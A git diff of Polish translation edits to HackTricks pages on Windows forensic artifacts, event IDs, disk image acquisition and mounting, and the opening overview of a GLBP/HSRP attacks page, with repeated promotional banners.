@ -257,9 +257,9 @@ Rejestr systemu Windows, przechowujący rozległe dane dotyczące aktywności sy
Niektóre narzędzia są przydatne do analizy plików rejestru:
* **Edytor Rejestru**: Zainstalowany w systemie Windows. Jest to interfejs graficzny umożliwiający nawigację po rejestrze systemu Windows bieżącej sesji.
* [**Eksplorator Rejestru**](https://ericzimmerman.github.io/#!index.md): Pozwala na załadowanie pliku rejestru i nawigację po nim za pomocą interfejsu graficznego. Zawiera również zakładki z wyróżnionymi kluczami zawierającymi interesujące informacje.
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Ponownie, posiada interfejs graficzny umożliwiający nawigację po załadowanym rejestrze i zawiera wtyczki wyróżniające interesujące informacje w załadowanym rejestrze.
* **Edytor Rejestru**: Zainstalowany w systemie Windows. Jest to interfejs graficzny do nawigacji po rejestrze systemu Windows bieżącej sesji.
* [**Eksplorator Rejestru**](https://ericzimmerman.github.io/#!index.md): Pozwala na załadowanie pliku rejestru i nawigację po nim za pomocą interfejsu graficznego. Zawiera również zakładki z kluczami zawierającymi interesujące informacje.
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Ponownie, posiada interfejs graficzny umożliwiający nawigację po załadowanym rejestrze oraz zawiera wtyczki podświetlające interesujące informacje w załadowanym rejestrze.
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Kolejna aplikacja z interfejsem graficznym zdolna do wyodrębniania istotnych informacji z załadowanego rejestru.
### Odzyskiwanie Usuniętego Elementu
@ -268,7 +268,7 @@ Gdy klucz jest usunięty, jest oznaczony jako taki, ale dopóki przestrzeń, kt
### Czas Ostatniej Modyfikacji
Każdy klucz-wartość zawiera **znacznik czasu**, wskazujący ostatni czas jego modyfikacji.
Każdy klucz-wartość zawiera **znacznik czasu**, wskazujący ostatnią modyfikację.
### SAM
@ -286,23 +286,23 @@ W `SAM\Domains\Account\Users` można uzyskać nazwę użytkownika, RID, ostatnie
### Podstawowe Procesy Windows
W [tym poście](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) można dowiedzieć się o powszechnych procesach systemu Windows, aby wykryć podejrzane zachowania.
W [tym poście](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) możesz dowiedzieć się o powszechnych procesach systemu Windows, aby wykryć podejrzane zachowania.
### Ostatnie Aplikacje Windows
W rejestrze `NTUSER.DAT` w ścieżce `Software\Microsoft\Current Version\Search\RecentApps` można znaleźć podklucze z informacjami o **uruchomionej aplikacji**, **ostatnim czasie** jej uruchomienia i **liczbie uruchomień**.
W rejestrze `NTUSER.DAT` w ścieżce `Software\Microsoft\Current Version\Search\RecentApps` można znaleźć podklucze z informacjami o **uruchomionej aplikacji**, **ostatnim czasie** jej uruchomienia oraz **liczbie uruchomień**.
### BAM (Moderator Aktywności w Tle)
Można otworzyć plik `SYSTEM` za pomocą edytora rejestru i w ścieżce `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` znaleźć informacje o **aplikacjach uruchomionych przez każdego użytkownika** (zauważ `{SID}` w ścieżce) i **czasie** ich uruchomienia (czas znajduje się w wartości danych rejestru).
Możesz otworzyć plik `SYSTEM` za pomocą edytora rejestru i w ścieżce `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` znajdziesz informacje o **aplikacjach uruchomionych przez każdego użytkownika** (zauważ `{SID}` w ścieżce) oraz **czasie** ich uruchomienia (czas znajduje się w wartości danych rejestru).
### Prefetch systemu Windows
Prefetching to technika, która pozwala komputerowi cicho **pobrać niezbędne zasoby potrzebne do wyświetlenia zawartości**, do której użytkownik **może mieć dostęp w najbliższej przyszłości**, aby zasoby można było szybciej uzyskać.
Prefetching systemu Windows polega na tworzeniu **pamięci podręcznej wykonanych programów**, aby można je było szybciej załadować. Te pamięci podręczne są tworzone jako pliki `.pf` w ścieżce: `C:\Windows\Prefetch`. Istnieje limit 128 plików w XP/VISTA/WIN7 i 1024 plików w Win8/Win10.
Prefetch systemu Windows polega na tworzeniu **pamięci podręcznej wykonanych programów**, aby można je było szybciej załadować. Te pamięci podręczne są tworzone jako pliki `.pf` w ścieżce: `C:\Windows\Prefetch`. Istnieje limit 128 plików w XP/VISTA/WIN7 i 1024 plików w Win8/Win10.
Nazwa pliku jest tworzona jako `{nazwa_programu}-{hash}.pf` (hash jest oparty na ścieżce i argumentach wykonywalnego pliku). W W10 te pliki są skompresowane. Należy zauważyć, że sama obecność pliku wskazuje, że **program został uruchomiony** w pewnym momencie.
Nazwa pliku jest tworzona jako `{nazwa_programu}-{hash}.pf` (hash jest oparty na ścieżce i argumentach wykonywalnego). W W10 te pliki są skompresowane. Należy zauważyć, że sama obecność pliku wskazuje, że **program został wykonany** w pewnym momencie.
Plik `C:\Windows\Prefetch\Layout.ini` zawiera **nazwy folderów plików, które są prefetowane**. Ten plik zawiera **informacje o liczbie uruchomień**, **daty** uruchomienia i **plików** **otwartych** przez program.
@ -314,7 +314,7 @@ Aby przejrzeć te pliki, można użyć narzędzia [**PEcmd.exe**](https://github
### Superprefetch
**Superprefetch** ma ten sam cel co prefetch, **szybsze ładowanie programów** przez przewidywanie, co zostanie załadowane następnie. Jednak nie zastępuje usługi prefetch.\
**Superprefetch** ma ten sam cel co prefetch, **szybsze ładowanie programów** poprzez przewidywanie, co zostanie załadowane następnie. Jednak nie zastępuje usługi prefetch.\
Ta usługa generuje pliki bazy danych w `C:\Windows\Prefetch\Ag*.db`.
W tych bazach danych można znaleźć **nazwę programu**, **liczbę wykonanych operacji**, **otwarte pliki**, **dostęp do woluminu**, **pełną ścieżkę**, **ramy czasowe** i **znaczniki czasu**.
@ -343,7 +343,7 @@ Możesz uzyskać dane z tego pliku za pomocą narzędzia [**srum\_dump**](https:
```
### AppCompatCache (ShimCache)
**AppCompatCache**, znany również jako **ShimCache**, stanowi część **Bazy danych zgodności aplikacji** opracowanej przez **Microsoft** w celu rozwiązywania problemów zgodności aplikacji. Ten komponent systemu rejestruje różne elementy metadanych plików, w tym:
**AppCompatCache**, znany również jako **ShimCache**, stanowi część **Bazy danych zgodności aplikacji** opracowanej przez **Microsoft** w celu rozwiązywania problemów zgodności aplikacji. Ten składnik systemu rejestruje różne elementy metadanych plików, w tym:
- Pełna ścieżka pliku
- Rozmiar pliku
@ -354,7 +354,7 @@ Możesz uzyskać dane z tego pliku za pomocą narzędzia [**srum\_dump**](https:
Takie dane są przechowywane w rejestrze w określonych lokalizacjach w zależności od wersji systemu operacyjnego:
- Dla systemu XP dane są przechowywane w `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` z pojemnością na 96 wpisów.
- Dla Servera 2003 oraz wersji systemu Windows 2008, 2012, 2016, 7, 8 i 10 ścieżka przechowywania to `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, z pojemnością na odpowiednio 512 i 1024 wpisy.
- Dla Servera 2003 oraz dla wersji systemu Windows 2008, 2012, 2016, 7, 8 i 10 ścieżka przechowywania to `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, z pojemnością na odpowiednio 512 i 1024 wpisy.
Do analizy przechowywanych informacji zaleca się użycie narzędzia [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser).
@ -362,7 +362,7 @@ Do analizy przechowywanych informacji zaleca się użycie narzędzia [**AppCompa
### Amcache
Plik **Amcache.hve** to w zasadzie rejestr bazy danych rejestrujący szczegóły dotyczące aplikacji uruchomionych w systemie. Zazwyczaj znajduje się w `C:\Windows\AppCompat\Programas\Amcache.hve`.
Plik **Amcache.hve** to w zasadzie rejestr bazy danych rejestrujący szczegóły dotyczące aplikacji uruchomionych w systemie. Zazwyczaj znajduje się pod adresem `C:\Windows\AppCompat\Programas\Amcache.hve`.
Ten plik jest znany z przechowywania rekordów niedawno uruchomionych procesów, w tym ścieżek do plików wykonywalnych i ich skrótów SHA1. Te informacje są nieocenione do śledzenia aktywności aplikacji w systemie.
@ -370,13 +370,13 @@ Aby wydobyć i przeanalizować dane z pliku **Amcache.hve**, można użyć narz
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
Wśród wygenerowanych plików CSV szczególnie godne uwagi są `Amcache_Unassociated file entries` ze względu na bogate informacje dotyczące niepowiązanych wpisów plików.
Wśród wygenerowanych plików CSV szczególnie godne uwagi są `Amcache_Unassociated file entries` ze względu na bogate informacje, jakie dostarczają o niepowiązanych wpisach plików.
Najbardziej interesującym plikiem CSV generowanym jest `Amcache_Unassociated file entries`.
Najbardziej interesującym plikiem CVS jest `Amcache_Unassociated file entries`.
### RecentFileCache
Ten artefakt można znaleźć tylko w W7 w `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i zawiera informacje o ostatnim wykonaniu niektórych plików binarnych.
Ten artefakt można znaleźć tylko w W7 w `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i zawiera informacje o ostatnim uruchomieniu niektórych plików binarnych.
Możesz użyć narzędzia [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) do analizy pliku.
@ -386,21 +386,21 @@ Możesz je wyodrębnić z `C:\Windows\Tasks` lub `C:\Windows\System32\Tasks` i o
### Usługi
Możesz je znaleźć w rejestrze pod `SYSTEM\ControlSet001\Services`. Można zobaczyć, co ma zostać wykonane i kiedy.
Możesz je znaleźć w rejestrze pod `SYSTEM\ControlSet001\Services`. Możesz zobaczyć, co ma zostać wykonane i kiedy.
### **Sklep Windows**
Zainstalowane aplikacje można znaleźć w `\ProgramData\Microsoft\Windows\AppRepository\`\
Ten repozytorium zawiera **dziennik** z **każdą zainstalowaną aplikacją** w systemie wewnątrz bazy danych **`StateRepository-Machine.srd`**.
W tabeli Aplikacji tej bazy danych można znaleźć kolumny: "ID aplikacji", "Numer pakietu" i "Nazwa wyświetlana". Te kolumny zawierają informacje o aplikacjach preinstalowanych i zainstalowanych, a można sprawdzić, czy niektóre aplikacje zostały odinstalowane, ponieważ identyfikatory zainstalowanych aplikacji powinny być sekwencyjne.
W tabeli Application tej bazy danych można znaleźć kolumny: "Application ID", "PackageNumber" i "Display Name". Te kolumny zawierają informacje o aplikacjach preinstalowanych i zainstalowanych, a można znaleźć informacje, czy niektóre aplikacje zostały odinstalowane, ponieważ identyfikatory zainstalowanych aplikacji powinny być sekwencyjne.
Możliwe jest również **znalezienie zainstalowanej aplikacji** w ścieżce rejestru: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
A **odinstalowane** **aplikacje** w: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
A **odinstalowane aplikacje** w: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
## Zdarzenia systemu Windows
Informacje pojawiające się w zdarzeniach systemu Windows to:
Informacje zawarte w zdarzeniach systemu Windows to:
* Co się stało
* Znacznik czasu (UTC + 0)
@ -412,11 +412,11 @@ Dzienniki znajdują się w `C:\Windows\System32\config` przed Windows Vista i w
Lokalizację plików zdarzeń można znaleźć w rejestrze SYSTEM w **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
Mogą być wizualizowane za pomocą Podglądu zdarzeń systemu Windows (**`eventvwr.msc`**) lub innymi narzędziami takimi jak [**Event Log Explorer**](https://eventlogxp.com) **lub** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
Można je wizualizować za pomocą Podglądu zdarzeń systemu Windows (**`eventvwr.msc`**) lub innymi narzędziami takimi jak [**Event Log Explorer**](https://eventlogxp.com) **lub** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
## Zrozumienie Rejestrowania Zdarzeń Bezpieczeństwa w systemie Windows
## Zrozumienie rejestrowania zdarzeń bezpieczeństwa systemu Windows
Zdarzenia dostępu są rejestrowane w pliku konfiguracji bezpieczeństwa znajdującym się w `C:\Windows\System32\winevt\Security.evtx`. Rozmiar tego pliku jest możliwy do dostosowania, a gdy osiągnie swoją pojemność, starsze zdarzenia są nadpisywane. Rejestrowane zdarzenia obejmują logowanie i wylogowywanie użytkowników, akcje użytkowników, zmiany ustawień zabezpieczeń, a także dostęp do plików, folderów i zasobów udostępnionych.
Zdarzenia dostępu są rejestrowane w pliku konfiguracji bezpieczeństwa znajdującym się w `C:\Windows\System32\winevt\Security.evtx`. Rozmiar tego pliku jest możliwy do dostosowania, a gdy osiągnie swoją pojemność, starsze zdarzenia są nadpisywane. Rejestrowane zdarzenia obejmują logowanie i wylogowywanie użytkowników, akcje użytkowników, zmiany ustawień zabezpieczeń, a także dostęp do plików, folderów i współdzielonych zasobów.
### Kluczowe identyfikatory zdarzeń dla uwierzytelniania użytkownika:
@ -428,17 +428,17 @@ Zdarzenia dostępu są rejestrowane w pliku konfiguracji bezpieczeństwa znajduj
#### Podtypy wewnątrz EventID 4634/4647:
- **Interaktywne (2)**: Bezpośrednie logowanie użytkownika.
- **Sieciowe (3)**: Dostęp do udostępnionych folderów.
- **Sieciowe (3)**: Dostęp do współdzielonych folderów.
- **Partia (4)**: Wykonywanie procesów wsadowych.
- **Usługa (5)**: Uruchomienia usług.
- **Usługa (5)**: Uruchamianie usługi.
- **Proxy (6)**: Uwierzytelnianie proxy.
- **Odblokuj (7)**: Odblokowanie ekranu za pomocą hasła.
- **Sieć w tekście jawnym (8)**: Przesyłanie hasła w tekście jawnym, często z IIS.
- **Nowe poświadczenia (9)**: Użycie innych poświadczeń do dostępu.
- **Zdalne interaktywne (10)**: Logowanie zdalne pulpitu lub usług terminalowych.
- **Interaktywne buforowane (11)**: Logowanie z buforowanymi poświadczeniami bez kontaktu z kontrolerem domeny.
- **Zdalne interaktywne buforowane (12)**: Zdalne logowanie z buforowanymi poświadczeniami.
- **Odblokowanie buforowane (13)**: Odblokowanie z buforowanymi poświadczeniami.
- **Zdalne interaktywne (10)**: Logowanie zdalne pulpitu zdalnego lub usług terminalowych.
- **Interaktywne pamięci podręcznej (11)**: Logowanie z pamięcią podręczną bez kontaktu z kontrolerem domeny.
- **Zdalne interaktywne pamięci podręcznej (12)**: Zdalne logowanie z pamięcią podręczną.
- **Odblokowanie z pamięci podręcznej (13)**: Odblokowanie z pamięci podręcznej.
#### Kody stanu i podkody stanu dla EventID 4625:
@ -448,23 +448,23 @@ Zdarzenia dostępu są rejestrowane w pliku konfiguracji bezpieczeństwa znajduj
- **0xC0000072**: Konto wyłączone - Nieautoryzowane próby dostępu do wyłączonych kont.
- **0xC000006F**: Logowanie poza dozwolonym czasem - Wskazuje na próby dostępu poza ustalonymi godzinami logowania, co może być oznaką nieautoryzowanego dostępu.
- **0xC0000070**: Naruszenie ograniczeń stacji roboczej - Może być próbą logowania z nieautoryzowanego miejsca.
- **0xC0000193**: Wygaśnięcie konta - Próby dostępu do kont z wygasłymi kontami użytkowników.
- **0xC0000071**: Wygasłe hasło - Próby logowania przy użyciu przestarzałych haseł.
- **0xC0000193**: Wygaśnięcie konta - Próby dostępu do kont z wygasłymi użytkownikami.
- **0xC0000071**: Wygasłe hasło - Próby logowania przy przestarzałych hasłach.
- **0xC0000133**: Problemy z synchronizacją czasu - Duże rozbieżności czasowe między klientem a serwerem mogą wskazywać na bardziej zaawansowane ataki, takie jak pass-the-ticket.
- **0xC0000224**: Wymagana zmiana hasła obowiązkowa - Częste obowiązkowe zmiany mogą sugerować próbę destabilizacji bezpieczeństwa konta.
- **0xC0000225**: Wskazuje na problem systemowy, a nie problem z bezpieczeństwem.
- **0xC0000225**: Wskazuje na błąd systemu, a nie problem z bezpieczeństwem.
- **0xC000015b**: Odmowa typu logowania - Próba dostępu z nieautoryzowanym typem logowania, na przykład użytkownik próbujący wykonać logowanie usługi.
#### EventID 4616:
- **Zmiana czasu**: Modyfikacja czasu systemowego, która może zaciemnić chronologię zdarzeń.
#### EventID 6005 i 6006:
- **Uruchomienie i Wyłączenie Systemu**: EventID 6005 oznacza uruchomienie systemu, a EventID 6006 oznacza jego wyłączenie.
- **Uruchomienie i wyłączenie systemu**: EventID 6005 oznacza uruchomienie systemu, a EventID 6006 jego wyłączenie.
#### EventID 1102:
- **Usuwanie logów**: Czyszczenie logów bezpieczeństwa, co często jest sygnałem ostrzegawczym ukrywania nielegalnych działań.
#### EventID dla Śledzenia Urządzeń USB:
#### EventID dla śledzenia urządzeń USB:
- **20001 / 20003 / 10000**: Pierwsze podłączenie urządzenia USB.
- **10100**: Aktualizacja sterownika USB.
- **EventID 112**: Czas włożenia urządzenia USB.
@ -473,33 +473,48 @@ Dla praktycznych przykładów symulowania tych typów logowań i możliwości wy
Szczegóły zdarzeń, w tym kody stanu i podkody stanu, dostarczają dalszych informacji na temat przyczyn zdarzeń, szczególnie istotne w przypadku Event ID 4625.
### Odzyskiwanie Zdarzeń Systemu Windows
### Odzyskiwanie zdarzeń systemu Windows
Aby zwiększyć szanse na odzyskanie usuniętych zdarzeń systemu Windows, zaleca się wyłączenie podejrzanego komputera poprzez bezpośrednie odłączenie go od zasilania. Zalecane jest użycie narzędzia do odzyskiwania **Bulk_extractor**, które obsługuje rozszerzenie `.evtx`, w celu próby odzyskania takich zdarzeń.
Aby zwiększyć szanse na odzyskanie usuniętych zdarzeń systemu Windows, zaleca się wyłączenie podejrzanego komputera, odłączając go bezpośrednio. Zalecane jest użycie narzędzia do odzyskiwania **Bulk_extractor**, które obsługuje rozszerzenie `.evtx`, aby spróbować odzyskać takie zdarzenia.
### Identyfikacja Powszechnych Ataków za pomocą Zdarzeń Systemu Windows
### Identyfikacja powszechnych ataków za pomocą zdarzeń systemu Windows
Aby uzyskać kompleksowy przewodnik dotyczący wykorzystania identyfikatorów zdarzeń systemu Windows w identyfikowaniu powszechnych ataków cybernetycznych, odwiedź [Red Team Recipe](https://redteamrecipe.com/event-codes/).
#### Ataki Brute Force
#### Ataki brutalnej siły
Można je zidentyfikować poprzez wielokrotne zapisy EventID 4625, a następnie EventID 4624, jeśli atak się powiedzie.
#### Zmiana Czasu
#### Zmiana czasu
Rejestrowana przez EventID 4616, zmiany czasu systemowego mogą utrudnić analizę śledzenia.
Rejestrowana przez EventID 4616, zmiany czasu systemowego mogą utrudnić analizę śledcza.
#### Śledzenie Urządzeń USB
#### Śledzenie urządzeń USB
Przydatne EventID Systemu dla śledzenia urządzeń USB obejmują 20001/20003/10000 dla pierwszego użycia, 10100 dla aktualizacji sterownika oraz EventID 112 z DeviceSetupManager dla znaczników czasowych włożenia urządzenia.
Przydatne EventID systemowe do śledzenia urządzeń USB obejmują 20001/20003/10000 dla pierwszego użycia, 10100 dla aktualizacji sterowników oraz EventID 112 z DeviceSetupManager dla znaczników czasowych włożenia urządzenia.
#### Zdarzenia zasilania systemu
EventID 6005 wskazuje na uruchomienie systemu, podczas gdy EventID 6006 oznacza wyłączenie.
#### Usuwanie logów
Zdarzenie bezpieczeństwa EventID 1102 sygnalizuje usunięcie logów, co jest istotne dla analizy śledczej.
Zdarzenie bezpieczeństwa EventID 1102 sygnalizuje usunięcie logów, co jest istotnym wydarzeniem dla analizy śledczej.
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

16
generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Zacznij naukę hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
@ -12,7 +12,7 @@
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -37,7 +37,7 @@ ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --descript
```
### EWF
Możesz wygenerować obraz dysku za pomocą [**narzędzi ewf**](https://github.com/libyal/libewf).
Możesz wygenerować obraz dysku, używając [**narzędzi ewf**](https://github.com/libyal/libewf).
```bash
ewfacquire /dev/sdb
#Name: evidence
@ -56,7 +56,7 @@ ewfacquire /dev/sdb
```
## Montowanie
### Kilka typów
### Kilka rodzajów
W systemie **Windows** można spróbować skorzystać z darmowej wersji narzędzia Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)), aby **zamontować obraz z dziedziny informatyki śledczej**.
@ -91,7 +91,7 @@ To aplikacja Windows do montowania woluminów. Możesz ją pobrać tutaj [https:
### Błędy
* **`nie można zamontować /dev/loop0 tylko do odczytu`** w tym przypadku należy użyć flag **`-o ro,norecovery`**
* **`zły typ systemu plików, zła opcja, zły superblok na /dev/loop0, brak strony kodowej lub programu pomocniczego, lub inny błąd.`** w tym przypadku montaż nie powiódł się, ponieważ przesunięcie systemu plików jest inne niż obrazu dysku. Musisz znaleźć rozmiar sektora i sektor początkowy:
* **`zły typ systemu plików, zła opcja, zły superblok na /dev/loop0, brak strony kodowej lub programu pomocniczego, lub inny błąd.`** w tym przypadku montaż nie powiódł się, ponieważ przesunięcie systemu plików różni się od obrazu dysku. Musisz znaleźć rozmiar sektora i sektor początkowy:
```bash
fdisk -l disk.img
Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors
@ -104,11 +104,11 @@ Disk identifier: 0x00495395
Device Boot Start End Sectors Size Id Type
disk.img1 2048 208895 206848 101M 1 FAT12
```
Zauważ, że rozmiar sektora wynosi **512**, a początek to **2048**. Następnie zamontuj obraz w ten sposób:
Zauważ, że rozmiar sektora wynosi **512** a początek to **2048**. Następnie zamontuj obraz w ten sposób:
```bash
mount disk.img /mnt -o ro,offset=$((2048*512))
```
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -116,7 +116,7 @@ mount disk.img /mnt -o ro,offset=$((2048*512))
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

60
generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
View file

@ -2,51 +2,51 @@
<details>
<summary><strong>Zacznij od zera i stań się ekspertem od hakowania AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) albo **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Przegląd Przechwytywania FHRP
### Wgląd w FHRP
FHRP został zaprojektowany w celu zapewnienia odporności sieci poprzez połączenie wielu routerów w jednostkę wirtualną, co zwiększa rozkład obciążenia i tolerancję na awarie. Cisco Systems wprowadził znaczące protokoły w tej grupie, takie jak GLBP i HSRP.
FHRP został zaprojektowany w celu zapewnienia odporności sieci poprzez połączenie wielu routerów w jednostkę wirtualną, co zwiększa dystrybucję obciążenia i tolerancję na awarie. Cisco Systems wprowadził prominentne protokoły w tej grupie, takie jak GLBP i HSRP.
### Wgląd w Protokół GLBP
Stworzony przez Cisco, GLBP działa na stosie TCP/IP, wykorzystując UDP na porcie 3222 do komunikacji. Routery w grupie GLBP wymieniają pakiety "hello" co 3 sekundy. Jeśli router nie wysyła tych pakietów przez 10 sekund, uznaje się go za offline. Jednak te timery nie są stałe i mogą być modyfikowane.
Stworzony przez Cisco, GLBP działa na stosie TCP/IP, wykorzystując UDP na porcie 3222 do komunikacji. Routery w grupie GLBP wymieniają pakiety "hello" co 3 sekundy. Jeśli router nie wyśle tych pakietów przez 10 sekund, uznaje się go za offline. Jednak te timery nie są stałe i mogą być modyfikowane.
### Operacje i Rozkład Obciążenia w GLBP
GLBP wyróżnia się umożliwieniem rozkładu obciążenia między routerami za pomocą jednego wirtualnego IP w połączeniu z wieloma wirtualnymi adresami MAC. W grupie GLBP każdy router bierze udział w przekazywaniu pakietów. W odróżnieniu od HSRP/VRRP, GLBP oferuje rzeczywiste równoważenie obciążenia poprzez kilka mechanizmów:
### Operacje i Dystrybucja Obciążenia w GLBP
